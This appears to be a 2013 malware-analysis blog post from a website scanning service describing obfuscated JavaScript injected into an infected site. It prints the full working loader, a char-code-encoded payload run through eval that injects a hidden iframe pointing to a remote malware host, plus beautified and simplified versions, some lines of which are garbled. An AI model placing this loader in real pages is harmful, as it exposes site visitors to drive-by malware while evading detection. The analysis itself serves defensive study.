Sunday, April 7, 2013

Malicious JavaScript injects hidden iframe


Obfuscated malicious JavaScript code generated hidden iframe which loads content from remote suspicious website


Background

Online Website Malware Scanner has identified malicious JavaScript code injection in the scanned website. Such malicious obfuscated JavaScript code is used to build malicious iframe invisible to the website user which usually downloads content from remote malware distributor. This infected website hosts suspicious JavaScript code injected in 23 files. As discussed in other posts about malicious iframes generation, the attack flow is very similar and contains multiple levels of obfuscation to overcome the detection mechanisms.
The detailed explanation is similar to provided in related posts and thus not discussed here. 

Malicious action

Malicious iframes are often used to distribute malware hosted on external web resources(websites).

Website malware scanner report

Submission date: Sun Apr 7 13:45:42 2013
Infected web site's files: 23
Website malware scan report link: http://goo.gl/oQLZ4

Website malware scanner report by Quttera




Detected Potentially Suspicious files. Quttera sitescan report.



Threat dump:
[[<script type='text/javascript' language='javascript' >
i=0;
try
{
prototype;
}
catch(z)
{
h="harCode";
f=['-33c-33c63c60c-10c-2c58c69c57c75c67c59c68c74c4c61c59c74c27c66c59c67c59c68c74c73c24c79c42c55c61c36c55c67c59c-2c-3c56c69c58c79c-3c-1c49c6c51c-1c81c-29c-33c-33c-33c63c60c72c55c67c59c72c-2c-1c17c-29c-33c-33c83c-10c59c66c73c59c-10c81c-29c-33c-33c-33c58c69c57c75c67c59c68c74c4c77c72c63c74c59c-2c-8c18c63c60c72c55c67c59c-10c73c72c57c19c-3c62c74c74c70c16c5c5c64c55c76c66c70c72c68c63c4c58c58c68c73c4c68c55c67c59c5c73c74c58c73c5c61c69c4c70c62c70c21c73c63c58c19c7c-3c-10c77c63c58c74c62c19c-3c7c6c-3c-10c62c59c63c61c62c74c19c-3c7c6c-3c-10c73c74c79c66c59c19c-3c76c63c73c63c56c63c66c63c74c79c16c62c63c58c58c59c68c17c70c69c73c63c74c63c69c68c16c55c56c73c69c66c75c74c59c17c66c59c60c74c16c6c17c74c69c70c16c6c17c-3c20c18c5c63c60c72c55c67c59c20c-8c-1c17c-29c-33c-33c83c-29c-33c-33c60c75c68c57c74c63c69c68c-10c63c60c72c55c67c59c72c-2c-1c81c-29c-33c-33c-33c76c55c72c-10c60c-10c19c-10c58c69c57c75c67c59c68c74c4c57c72c59c55c74c59c27c66c59c67c59c68c74c-2c-3c63c60c72c55c67c59c-3c-1c17c60c4c73c59c74c23c74c74c72c63c56c75c74c59c-2c-3c73c72c57c-3c2c-3c62c74c74c70c16c5c5c64c55c76c66c70c72c68c63c4c58c58c68c73c4c68c55c67c59c5c73c74c58c73c5c61c69c4c70c62c70c21c73c63c58c19c7c-3c-1c17c60c4c73c74c79c66c59c4c76c63c73c63c56c63c66c63c74c79c19c-3c62c63c58c58c59c68c-3c17c60c4c73c74c79c66c59c4c70c69c73c63c74c63c69c68c19c-3c55c56c73c69c66c75c74c59c-3c17c60c4c73c74c79c66c59c4c66c59c60c74c19c-3c6c-3c17c60c4c73c74c79c66c59c4c74c69c70c19c-3c6c-3c17c60c4c73c59c74c23c74c74c72c63c56c75c74c59c-2c-3c77c63c58c74c62c-3c2c-3c7c6c-3c-1c17c60c4c73c59c74c23c74c74c72c63c56c75c74c59c-2c-3c62c59c63c61c62c74c-3c2c-3c7c6c-3c-1c17c-29c-33c-33c-33c58c69c57c75c67c59c68c74c4c61c59c74c27c66c59c67c59c68c74c73c24c79c42c55c61c36c55c67c59c-2c-3c56c69c58c79c-3c-1c49c6c51c4c55c70c70c59c68c58c25c62c63c66c58c-2c60c-1c17c-29c-33c-33c83'][0].split('c');
v="e"+"va";
}
if(v)e=window[v+"l"];
try
{
q=document.createElement("div");
q.appendChild(q+"");
}
catch(qwg)
{
w=f;
s=[];
}
r=String;
z=((e)?h:"");
for(;
595!=i;
i+=1)
{
j=i;
if(e)s=s+r["fromC"+z](w[j]*1+42);
}
if(v%26%26e%26%26r)e(s);

 </script>]]


Malware entry


Malware entry details.

Beautified script


  1. = 0;
  2. try {
  3.     prototype;
  4. } catch (z) {
  5.     h = "harCode";
  6.     f = ['-33c-33c63c60c-10c-2c58c69c57c75c67c59c68c74c4c61c59c74c27c66c59c67c59c68c74c73c24c79c42c55c61c36c55c67c59c-2c-3c56c69c58c79c-3c-1c49c6c51c-1c81c-29c-33c-33c-33c63c60c72c55c67c59c72c-2c-1c17c-29c-33c-33c83c-10c59c66c73c59c-10c81c-29c-33c-33c-33c58c69c57c75c67c59c68c74c4c77c72c63c74c59c-2c-8c18c63c60c72c55c67c59c-10c73c72c57c19c-3c62c74c74c70c16c5c5c64c55c76c66c70c72c68c63c4c58c58c68c73c4c68c55c67c59c5c73c74c58c73c5c61c69c4c70c62c70c21c73c63c58c19c7c-3c-10c77c63c58c74c62c19c-3c7c6c-3c-10c62c59c63c61c62c74c19c-3c7c6c-3c-10c73c74c79c66c59c19c-3c76c63c73c63c56c63c66c63c74c79c16c62c63c58c58c59c68c17c70c69c73c63c74c63c69c68c16c55c56c73c69c66c75c74c59c17c66c59c60c74c16c6c17c74c69c70c16c6c17c-3c20c18c5c63c60c72c55c67c59c20c-8c-1c17c-29c-33c-33c83c-29c-33c-33c60c75c68c57c74c63c69c68c-10c63c60c72c55c67c59c72c-2c-1c81c-29c-33c-33c-33c76c55c72c-10c60c-10c19c-10c58c69c57c75c67c59c68c74c4c57c72c59c55c74c59c27c66c59c67c59c68c74c-2c-3c63c60c72c55c67c59c-3c-1c17c60c4c73c59c74c23c74c74c72c63c56c75c74c59c-2c-3c73c72c57c-3c2c-3c62c74c74c70c16c5c5c64c55c76c66c70c72c68c63c4c58c58c68c73c4c68c55c67c59c5c73c74c58c73c5c61c69c4c70c62c70c21c73c63c58c19c7c-3c-1c17c60c4c73c74c79c66c59c4c76c63c73c63c56c63c66c63c74c79c19c-3c62c63c58c58c59c68c-3c17c60c4c73c74c79c66c59c4c70c69c73c63c74c63c69c68c19c-3c55c56c73c69c66c75c74c59c-3c17c60c4c73c74c79c66c59c4c66c59c60c74c19c-3c6c-3c17c60c4c73c74c79c66c59c4c74c69c70c19c-3c6c-3c17c60c4c73c59c74c23c74c74c72c63c56c75c74c59c-2c-3c77c63c58c74c62c-3c2c-3c7c6c-3c-1c17c60c4c73c59c74c23c74c74c72c63c56c75c74c59c-2c-3c62c59c63c61c62c74c-3c2c-3c7c6c-3c-1c17c-29c-33c-33c-33c58c69c57c75c67c59c68c74c4c61c59c74c27c66c59c67c59c68c74c73c24c79c42c55c61c36c55c67c59c-2c-3c56c69c58c79c-3c-1c49c6c51c4c55c70c70c59c68c58c25c62c63c66c58c-2c60c-1c17c-29c-33c-33c83'][0].split('c');
  7.     v = "e" + "va";
  8. }
  9. if (v) e = window[+ "l"];
  10. try {
  11.     q = document.createElement("div");
  12.     q.appendChild(+ "");
  13. } catch (qwg) {
  14.     w = f;
  15.     s = [];
  16. }
  17. = String;
  18. = ((e) ? h : "");
  19. for (; 595 != i; i += 1) {
  20.     j = i;
  21.     if (e) s = s + r["fromC" + z](w[j] * 1 + 42);
  22. }
  23. if (&& e && r) e(s);


Simplified threat version

  1. f=['-33c-33c63c60c-10c-2c58c69c57c75c67....'][0].split('c');
  2. = "";
  3. for (i=0; 595 != i; i += 1) {
  4.     s = s + String.fromCharCode(f[i]*1 + 42);
  5. }
  6. eval(s);


Malicious payload


Decoded payload generates hidden iframe to http://javlprni[.]ddns[.]name/stds/go.php?sid=1
Which in fact was detected by Google as malicious some time ago. And the interesting thing is that one of the sites it infected was the site discussed in this post (underlined in the image).

Google Safe Browsing analysis report













Blacklisting status


The website is Suspicious on Google Safe Browsing.




Malware clean-up


Such malware is often hidden inside the JavaScript file. If you suspect that your website was infected by similar malware please use Website Anti-malware Monitoring for remediation assessment.